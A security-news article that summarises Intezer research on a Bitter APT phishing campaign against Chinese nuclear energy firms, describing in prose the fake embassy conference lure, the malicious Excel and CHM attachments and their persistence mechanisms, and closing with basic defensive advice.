Bitter APT espionage group smites nuclear energy firms in China

A notorious APT espionage group that typically targets the energy and government sectors in South and Southeast Asia has recently launched new campaigns aimed at critical organizations in China. 

The group’s tactics, techniques, and procedures (TTPs) align with previous attacks and involve phishing emails containing Excel and Compiled HTML Help (CHM) attachments.

Picking out nuclear energy firms

According to Intezer researchers, a recent attack on various nuclear energy companies and academics in China begins with a fraudulent email. The email claims to have been sent by the Embassy of Kyrgyzstan in Beijing and invites recipients to a nuclear energy-related conference. 

Malicious activity we've discovered targeted the nuclear energy industry in China, using tactics aligned with Bitter APT.

Our research analyzes new tactics and payloads used by the threat actor, and their social engineering strategy with phishing emails: https://t.co/hMeFMPwBYE pic.twitter.com/tWoFr4ICwB

— Intezer (@IntezerLabs) March 24, 2023

The conference is allegedly held by the International Atomic Energy Agency (IAEA), the China Institute of International Studies (CIIS), and the Kyrgyz Embassy. To make the email appear legitimate, it includes 

• The names of genuine officials from the Kyrgyzstan Ministry of Foreign Affairs
• Instructs users to download a RAR file containing an invitation card for the conference
• Malicious links and has either an infected Excel file or a CHM.

“We identified seven emails pretending to be from the Embassy of Kyrgyzstan being sent to recipients in the nuclear energy industry in China. In some emails related to nuclear energy, people and entities in academia are also targeted. The phishing emails contain a lure that invites the recipients to join conferences on subjects that are relevant to them.”

Modus operandi: molded attack

• The Excel or CHM files used in the attack aim to establish a persistent presence and download additional payloads onto the compromised system. 

• The Excel file harbors an exploit for Equation Editor. Upon execution, it creates two scheduled tasks that run every 15 minutes and employs curl to download the next EXE payload. 
• CHM files are leveraged to execute arbitrary code. They also create a scheduled task that runs msiexec to acquire a remote MSI payload from the command and control (C2) server and execute it. 
• In one version of the CHM file payload, encoded PowerShell commands are used to create the same scheduled task and conceal the activity. 

Although the actual payload used for the second-stage attack could not be captured, it is believed to be keyloggers, info-stealers, or remote access Trojans, which have been used in previous attacks by the Bitter APT group.

Concluding subsequent plan of action

Bitter APT has been well-known for similar tactics for years. They have been targeting nuclear power plants in Asian Pacific regions. It is better to be aware of their action plan to avoid being under control. 

Validation is necessary when you open links sent by unknown senders. Also, firms do not commonly use CHM files, and they must be avoided. Being proactive is the best strategy to armor against cyber threats.